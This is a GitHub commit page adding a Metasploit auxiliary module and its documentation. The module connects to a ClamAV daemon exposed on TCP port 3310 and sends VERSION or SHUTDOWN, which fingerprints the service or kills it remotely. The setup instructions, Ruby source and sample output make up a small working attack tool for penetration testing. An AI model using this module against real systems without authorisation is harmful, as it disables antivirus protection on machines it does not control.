-
Notifications
You must be signed in to change notification settings - Fork 13.8k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land #6980, Add ClamAV Remote Command Transmitter
- Loading branch information
Showing
2 changed files
with
148 additions
and
0 deletions.
There are no files selected for viewing
91 changes: 91 additions & 0 deletions
91
documentation/modules/auxiliary/scanner/misc/clamav_control.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,91 @@ | ||
ClamAV is an open source antivirus engine for detecting trojans, viruses, malare, and other | ||
malicious threats. | ||
|
||
clamav_control takes advantage of a possible misconfiguration in the ClamAV service on release | ||
0.99.2 if the service is tied to a socket, and allows you fingerprint the version, and being | ||
able to shut down the service. | ||
|
||
## Vulnerable Application | ||
|
||
To install ClamAV from Ubuntu: | ||
|
||
``` | ||
$ sudo apt-get install clamav clamav-daemon | ||
$ sudo freshclam | ||
``` | ||
|
||
You might also need to add the following to /etc/clamav/clamd.conf: | ||
|
||
``` | ||
# TCP port address. | ||
# Default: no | ||
TCPSocket 3310 | ||
# TCP address. | ||
# By default we bind to INADDR_ANY, probably not wise. | ||
# Enable the following to provide some degree of protection | ||
# from the outside world. | ||
# Default: no | ||
TCPAddr 0.0.0.0 | ||
# Maximum length the queue of pending connections may grow to. | ||
# Default: 15 | ||
MaxConnectionQueueLength 30 | ||
# Clamd uses FTP-like protocol to receive data from remote clients. | ||
# If you are using clamav-milter to balance load between remote clamd daemons | ||
# on firewall servers you may need to tune the options below. | ||
# Close the connection when the data size limit is exceeded. | ||
# The value should match your MTA's limit for a maximum attachment size. | ||
# Default: 10M | ||
StreamMaxLength 55M | ||
# Limit port range. | ||
# Default: 1024 | ||
#StreamMinPort 30000 | ||
# Default: 2048 | ||
#StreamMaxPort 32000 | ||
# Maximum number of threads running at the same time. | ||
# Default: 10 | ||
MaxThreads 50 | ||
# Waiting for data from a client socket will timeout after this time (seconds). | ||
# Value of 0 disables the timeout. | ||
# Default: 120 | ||
ReadTimeout 300 | ||
# Waiting for a new job will timeout after this time (seconds). | ||
# Default: 30 | ||
#IdleTimeout 60 | ||
# Maximum depth directories are scanned at. | ||
# Default: 15 | ||
#MaxDirectoryRecursion 20 | ||
``` | ||
|
||
And finally, start the service: | ||
|
||
``` | ||
$ sudo /etc/init.d/clamav-daemon start | ||
``` | ||
|
||
## Options | ||
|
||
clamav_control comes with two actions: | ||
|
||
**VERSION** | ||
|
||
This is the default action, and shows you the ClamAV version. Output example: | ||
|
||
``` | ||
msf auxiliary(clamav_control) > run | ||
[+] 192.168.1.203:3310 - ClamAV 0.98.7/21772/Wed Jun 22 12:54:15 2016 | ||
``` | ||
|
||
**SHUTDOWN** | ||
|
||
This action allows you to shutdown ClamAV. You can also use the VERSION action again to verify | ||
whether is service is down or not. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,57 @@ | ||
## | ||
# This module requires Metasploit: http://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
require 'msf/core' | ||
|
||
class MetasploitModule < Msf::Auxiliary | ||
include Msf::Exploit::Remote::Tcp | ||
include Msf::Auxiliary::Scanner | ||
def initialize(info = {}) | ||
super( | ||
update_info( | ||
info, | ||
'Name' => 'ClamAV Remote Command Transmitter', | ||
'Description' => %q( | ||
In certain configurations, ClamAV will bind to all addresses and listen for commands. | ||
This module sends properly-formatted commands to the ClamAV daemon if it is in such a | ||
configuration. | ||
), | ||
'Author' => [ | ||
'Alejandro Hdeza', # DISCOVER | ||
'bwatters-r7', # MODULE | ||
'wvu' # GUIDANCE | ||
], | ||
'License' => MSF_LICENSE, | ||
'References' => [ | ||
[ 'URL', 'https://twitter.com/nitr0usmx/status/740673507684679680/photo/1' ], | ||
[ 'URL', 'https://github.com/vrtadmin/clamav-faq/raw/master/manual/clamdoc.pdf' ] | ||
], | ||
'DisclosureDate' => 'Jun 8 2016', | ||
'Actions' => [ | ||
[ 'VERSION', 'Description' => 'Get Version Information' ], | ||
[ 'SHUTDOWN', 'Description' => 'Kills ClamAV Daemon' ] | ||
], | ||
'DefaultAction' => 'VERSION' | ||
) | ||
) | ||
register_options( | ||
[ | ||
Opt::RPORT(3310) | ||
], self.class | ||
) | ||
end | ||
|
||
def run_host(_ip) | ||
begin | ||
connect | ||
sock.put(action.name + "\n") | ||
print_good(sock.get_once) | ||
rescue EOFError | ||
print_good('Successfully shut down ClamAV Service') | ||
ensure | ||
disconnect | ||
end | ||
end | ||
end |